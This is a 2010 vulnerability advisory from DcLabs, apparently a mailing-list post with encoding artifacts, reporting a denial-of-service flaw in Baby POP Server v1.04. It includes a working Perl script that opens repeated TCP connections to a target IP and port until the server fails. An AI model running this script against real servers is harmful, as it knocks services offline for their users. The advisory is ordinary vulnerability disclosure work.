[DCA-0005]

[Software]

=A0- Baby POP Server

[Vendor Product Description]

=A0- In the past I have done several projects related to e-mail
(POP3/SMTP/IMAP4). One of the problems (at least in my company) is
that there are never good test servers available. So that's why I
decided to create this simple POP3 server, which doesn=92t take many
resources and supports most of the standard POP3 commands.

[Bug Description]

=A0- The POP Server can't handle multiple/simultaneous connections
leading to Denial-of-Service

[History]

=A0- Advisory sent to vendor on 06/14/2010.
=A0- No response from vendor
=A0- Public advisory & exploit 08/02/2010.

[Impact]

=A0- Low

[Affected Version]

=A0- Baby POP Server v1.04
=A0- Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

=A0=A0=A0=A0=A0=A0=A0 if (@ARGV < 1) {
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 usage();
=A0=A0=A0=A0=A0=A0=A0 }

=A0=A0=A0=A0=A0=A0=A0 $ip=A0=A0=A0=A0 = $ARGV[0];
=A0=A0=A0=A0=A0=A0=A0 $port=A0=A0 = $ARGV[1];
=A0=A0=A0=A0=A0=A0=A0 $conn=A0=A0 = $ARGV[2];

=A0=A0=A0=A0=A0=A0=A0 $num=A0=A0=A0 = 0;

=A0=A0=A0=A0=A0=A0=A0 print "[+] Sending request...\n";

=A0=A0=A0=A0=A0=A0=A0 while ( $num <= $conn ) {
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 system("echo -n .");
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

=A0=A0=A0=A0=A0=A0=A0 close($s);
=A0=A0=A0=A0=A0=A0=A0 $num++;
=A0=A0=A0=A0=A0=A0=A0 }

=A0=A0=A0=A0=A0=A0=A0 print "\n[+] Done!\n";

sub usage() {
=A0=A0=A0=A0=A0=A0=A0 print "[-] Usage: <". $0 .">   \n";
=A0=A0=A0=A0=A0=A0=A0 print "[-] Example: ". $0 ." 127.0.0.1 110 1200\n";
=A0=A0=A0=A0=A0=A0=A0 exit;
}


[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br 


[Greetz]
Crash and all Dclabs members.


-- 
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br